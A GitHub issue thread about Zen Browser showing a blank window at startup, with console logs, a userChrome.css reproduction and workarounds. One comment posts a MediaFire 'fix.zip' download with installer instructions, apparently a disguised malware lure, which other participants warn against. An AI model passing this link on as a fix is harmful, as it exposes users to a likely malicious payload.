### ISSUE TITLE
Zen Browser is blank at startup

### ISSUE THREAD

**Issue by kLabz** [zen-browser/desktop#649]
### What happened?

Zen Browser is blank at startup:
![image](https://github.com/user-attachments/assets/38d6d9ac-e35f-4c8a-9c8e-f83552ba90d7)

Workaround is to start fresh on a new profile (for example via `zen-browser --ProfileManager`), but I already had to do that once for the same reason and took a lot of time configuring this one.. :/

Got some logs through `zen-browser --jsconsole`, hope it can help..

### Reproducible?

- [X] I have checked that this issue cannot be reproduced on Mozilla Firefox.

### Version

1.0.0-a.28

### Severity impact

Critical

### What platform are you seeing the problem on?

Linux

### Relevant log output

```shell
1724571445838	addons.xpi	WARN	Checking /opt/zen-browser-bin/distribution/extensions for addons
Uncaught TypeError: this.editor is null
    UrlbarInput resource:///modules/UrlbarInput.sys.mjs:266
    <anonymous> chrome://browser/content/browser.js:353
    _setURLBarPlaceholder chrome://browser/content/browser.js:2317
    initPlaceHolder chrome://browser/content/browser.js:2222
    onDOMContentLoaded chrome://browser/content/browser-init.js:153
UrlbarInput.sys.mjs:266:1
ZenThemeImporter: Initiating Zen theme importer ZenThemesImporter.mjs:38:13
ZenThemeImporter: Zen theme imported ZenThemesImporter.mjs:43:15
ZenWorkspaces: Initializing ZenWorkspaces... ZenWorkspaces.mjs:11:13
ZenWorkspaces: ZenWorkspaces initialized ZenWorkspaces.mjs:13:13
Uncaught TypeError: gURLBar is undefined
    update chrome://browser/content/browser.js:5240
    init chrome://browser/content/browser.js:5167
    onLoad chrome://browser/content/browser-init.js:234
browser.js:5240:5
```

**Comment by AlecsSantos** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by kLabz** [comment]
> Download https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file In the installer menu, select "gcc."

No way I'd trust that.

**Comment by mauro-balades** [comment]
Don't download it!

**Comment by kLabz** [comment]
Repro: add this to your `userChrome.css` and open a new window / launch Zen browser:

```css
#navigator-toolbox {
  display: none !important;
}
```

**Comment by mauro-balades** [comment]
Well... Having it `display: none` will obviously have issues with the JS because we wont be able to query select it anymore!

If you want, you can have `visibility: hidden;` or having it position absolute with `pointer-events: none`

**Comment by ntovarsolorzano** [comment]
My Workaround (Windows): 
- Just open a 'New Window'. The new windows does not have any issues. 
- NOTE: If you pull the tabs you had in the buggy windows to the New Window, those tabs will remain 'buggy'. (maybe the clue of what's the root issues is in this event? )
